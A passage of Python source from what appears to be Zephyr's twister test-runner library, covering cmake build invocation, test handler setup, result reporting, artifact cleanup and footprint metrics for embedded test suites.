def add_missing_testscases(self, status, reason=None):
for case in self.testcases:
if not case.status:
case.status = status
if reason:
case.reason = reason
else:
case.reason = self.reason
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
def set_case_status_by_name(self, name, status, reason=None):
tc = self.get_case_or_create(name)
tc.status = status
if reason:
tc.reason = reason
return tc
def add_testcase(self, name):
tc = TestCase(name=name)
self.testcases.append(tc)
return tc
def get_case_by_name(self, name):
for c in self.testcases:
if c.name == name:
return c
return None
def get_case_or_create(self, name):
for c in self.testcases:
if c.name == name:
return c
logger.debug(f"Could not find a matching testcase for {name}")
tc = TestCase(name=name)
self.testcases.append(tc)
return tc
@staticmethod
def testsuite_runnable(testsuite, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testsuite.harness in [ 'console', 'ztest', 'pytest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testsuite.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testsuite.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testsuite.build_only:
return False
# Do not run slow tests:
skip_slow = self.testsuite.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testsuite.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim", "armfvp", "xt-sim"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testsuite_runnable = self.testsuite_runnable(self.testsuite, fixtures)
return testsuite_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "twister/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "twister")
content = ""
if self.testsuite.extra_configs:
content = "\n".join(self.testsuite.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testsuite_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if '_pre' not in x]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testsuite.extra_sections)
def __repr__(self):
return "<TestSuite %s on %s>" % (self.testsuite.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testsuite, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testsuite = testsuite
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
self.default_encoding = sys.getdefaultencoding()
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
if not self.instance.run:
self.instance.add_missing_testscases("skipped", "Test was built only")
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(self.default_encoding)
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log.write(log_msg)
if log_msg:
overflow_found = re.findall("region `(FLASH|ROM|RAM|ICCM|DCCM|SRAM)' overflowed by", log_msg)
if overflow_found and not self.overflow_as_errors:
logger.debug("Test skipped due to {} Overflow".format(overflow_found[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(overflow_found[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Werror -Wa,--fatal-warnings"
gen_defines_args = "--edtlib-Werror"
else:
ldflags = cflags = aflags = ""
gen_defines_args = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DTC_RUNID={self.instance.run_id}',
f'-DEXTRA_CFLAGS={cflags}',
f'-DEXTRA_AFLAGS={aflags}',
f'-DEXTRA_LDFLAGS={ldflags}',
f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
f'-G{self.generator}'
]
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
for tc in self.instance.testcases:
tc.status = self.instance.status
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a", encoding=self.default_encoding) as log:
log_msg = out.decode(self.default_encoding)
log.write(log_msg)
return results
@staticmethod
def run_cmake_script(args=[]):
logger.debug("Running cmake script %s" % (args[0]))
cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
cmake_args.extend(['-P', args[0]])
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
if not cmake:
msg = "Unable to find `cmake` in path"
logger.error(msg)
raise Exception(msg)
cmd = [cmake] + cmake_args
kwargs = dict()
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
# It might happen that the environment adds ANSI escape codes like \x1b[0m,
# for instance if twister is executed from inside a makefile. In such a
# scenario it is then necessary to remove them, as otherwise the JSON decoding
# will fail.
ansi_escape = re.compile(r'\x1B(?:[@-Z\\-_]|\[[0-?]*[ -/]*[@-~])')
out = ansi_escape.sub('', out.decode())
if p.returncode == 0:
msg = "Finished running %s" % (args[0])
logger.debug(msg)
results = {"returncode": p.returncode, "msg": msg, "stdout": out}
else:
logger.error("Cmake script failure: %s" % (args[0]))
results = {"returncode": p.returncode, "returnmsg": out}
return results
class FilterBuilder(CMake):
def __init__(self, testsuite, platform, source_dir, build_dir):
super().__init__(testsuite, platform, source_dir, build_dir)
self.log = "config-twister.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testsuite and self.testsuite.ts_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testsuite.ts_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testsuite.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testsuite.name): True}
else:
return {os.path.join(self.platform.name, self.testsuite.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, tplan, instance, **kwargs):
super().__init__(instance.testsuite, instance.platform, instance.testsuite.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.testplan = tplan
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
self.suite_name_check = kwargs.get('suite_name_check', True)
self.seed = kwargs.get('seed', 0)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testsuite.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
instance.handler.coverage = self.coverage
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "armfvp":
instance.handler = BinaryHandler(instance, "armfvp")
instance.handler.call_make_run = True
elif instance.platform.simulation == "xt-sim":
instance.handler = BinaryHandler(instance, "xt-sim")
instance.handler.call_make_run = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
instance.handler.suite_name_check = self.suite_name_check
def process(self, pipeline, done, message, lock, results):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
res = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
# Here we check the runtime filter results coming from running cmake
if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "filtered"
self.instance.reason = "runtime filter"
results.skipped_runtime += 1
self.instance.add_missing_testscases("skipped")
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
res = self.build()
if not res:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
# Count skipped cases during build, for example
# due to ram/rom overflow.
if self.instance.status == "skipped":
results.skipped_runtime += 1
self.instance.add_missing_testscases("skipped", self.instance.reason)
if res.get('returncode', 1) > 0:
self.instance.add_missing_testscases("blocked", self.instance.reason)
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "gather_metrics", "test": self.instance})
elif op == "gather_metrics":
self.gather_metrics(self.instance)
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
logger.debug(f"run status: {self.instance.name} {self.instance.status}")
# to make it work with pickle
self.instance.handler.thread = None
self.instance.handler.testplan = None
pipeline.put({
"op": "report",
"test": self.instance,
"status": self.instance.status,
"reason": self.instance.reason
}
)
# Report results and output progress to screen
elif op == "report":
with lock:
done.put(self.instance)
self.report_out(results)
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self, results):
total_to_do = results.total
total_tests_width = len(str(total_to_do))
results.done += 1
instance = self.instance
if instance.status in ["error", "failed"]:
if instance.status == "error":
results.error += 1
else:
results.failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testsuite.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status in ["skipped", "filtered"]:
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
results.skipped_configs += 1
results.skipped_cases += len(instance.testsuite.testcases)
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
results.passed += 1
for case in instance.testcases:
if case.status == 'skipped':
results.skipped_cases += 1
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status in ["skipped", "filtered"]:
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.execution_time
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
if ( instance.status in ["error", "failed", "timeout", "flash_error"]
and hasattr(self.instance.handler, 'seed')
and self.instance.handler.seed is not None ):
more_info += "/seed: " + str(self.seed)
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
results.done + results.skipped_filter, total_tests_width, total_to_do , instance.platform.name,
instance.testsuite.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if total_to_do > 0:
completed_perc = int((float(results.done + results.skipped_filter) / total_to_do) * 100)
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
results.done + results.skipped_filter,
total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if results.skipped_configs > 0 else Fore.RESET,
results.skipped_filter + results.skipped_runtime,
Fore.RESET,
Fore.RED if results.failed > 0 else Fore.RESET,
results.failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testsuite.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if os.path.exists(os.path.join(instance.build_dir,
"twister", "testsuite_extra.conf")):
overlays.append(os.path.join(instance.build_dir,
"twister", "testsuite_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
res = self.run_cmake(args)
return res
def build(self):
res = self.run_build(['--build', self.build_dir])
return res
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.testplan = self.testplan
if(self.seed is not None and instance.platform.name.startswith("native_posix")):
self.parse_generated()
if('CONFIG_FAKE_ENTROPY_NATIVE_POSIX' in self.defconfig and
self.defconfig['CONFIG_FAKE_ENTROPY_NATIVE_POSIX'] == 'y'):
instance.handler.seed = self.seed
instance.handler.handle()
sys.stdout.flush()
def gather_metrics(self, instance):
if self.testplan.enable_size_report and not self.testplan.cmake_only:
self.calc_one_elf_size(instance)
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
@staticmethod
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.execution_time
class TestPlan(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
ts_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "testsuite-schema.yaml"))
quarantine_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "quarantine-schema.yaml"))
testsuite_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"modules": {"type": "list", "default": []},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"testcases": {"type": "list", "default": []},
"platform_type": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}},
"seed": {"type": "int", "default": 0}
}
SAMPLE_FILENAME = 'sample.yaml'
TESTSUITE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testsuite_roots=[], outdir=None):
self.roots = testsuite_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Test Plan Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.detailed_skipped_report = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
self.overflow_as_errors = False
self.quarantine_verify = False
self.retry_build_errors = False
self.suite_name_check = True
self.seed = 0
# Keep track of which test cases we've filtered out and why
self.testsuites = {}
self.quarantine = {}
self.platforms = []
self.platform_names = []
self.selected_platforms = []
self.filtered_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
# hardcoded for now
self.duts = []
# run integration tests only
self.integration = False
# used during creating shorter build paths
self.link_dir_counter = 0
self.pipeline = None
self.version = "NA"
self.modules = []
self.timestamp = datetime.now().isoformat()
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe", "--abbrev=12", "--always"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + os.sep)}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None):
for instance in self.instances.values():
results.cases += len(instance.testsuite.testcases)
if instance.status == 'filtered':
results.skipped_filter += 1
results.skipped_configs += 1
elif instance.status == 'passed':
results.passed += 1
results.done += 1
elif instance.status == 'error':
results.error += 1
results.done += 1
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
jt = json.load(fp)
for ts in jt.get("testsuites", []):
d = {}
for m, _, _ in interesting_metrics:
d[m] = ts.get(m, 0)
ts_name = ts.get('name')
ts_platform = ts.get('platform')
saved_metrics[(ts_name, ts_platform)] = d
for instance in self.instances.values():
mkey = (instance.testsuite.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testsuite.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
# FIXME: need a better way to identify executed tests
handler_time = instance.metrics.get('handler_time', 0)
if float(handler_time) > 0:
run += 1
if results.total and results.total != results.skipped_configs:
pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
results.passed,
results.total,
Fore.RESET,
pass_rate,
Fore.RED if results.failed else Fore.RESET,
results.failed + results.error,
Fore.RESET,
results.skipped_configs,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
# if we are only building, do not report about tests being executed.
if self.platforms and not self.build_only:
logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
results.cases - results.skipped_cases,
results.skipped_cases,
len(self.filtered_platforms),
self.total_platforms,
(100 * len(self.filtered_platforms) / len(self.platforms))
))
built_only = results.total - run - results.skipped_configs
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{built_only}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, platform_reports):
if not self.instances:
return
logger.info("Saving reports...")
if name:
report_name = name
else:
report_name = "twister"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
json_file = filename + ".json"
self.json_report(json_file, version=self.version)
self.xunit_report(json_file, filename + ".xml", full_report=False)
self.xunit_report(json_file, filename + "_report.xml", full_report=True)
self.xunit_report_suites(json_file, filename + "_suite_report.xml")
if platform_reports:
self.target_report(json_file, outdir, suffix)
def target_report(self, json_file, outdir, suffix):
platforms = {inst.platform.name for _, inst in self.instances.items()}
for platform in platforms:
if suffix:
filename = os.path.join(outdir,"{}_{}.xml".format(platform, suffix))
else:
filename = os.path.join(outdir,"{}.xml".format(platform))
self.xunit_report(json_file, filename, platform, full_report=True)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.twister:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
self.platform_names = [p.name for p in self.platforms]
def get_all_tests(self):
testcases = []
for _, ts in self.testsuites.items():
for case in ts.testcases:
testcases.append(case)
return testcases
@staticmethod
def get_toolchain():
toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/modules/verify-toolchain.cmake')
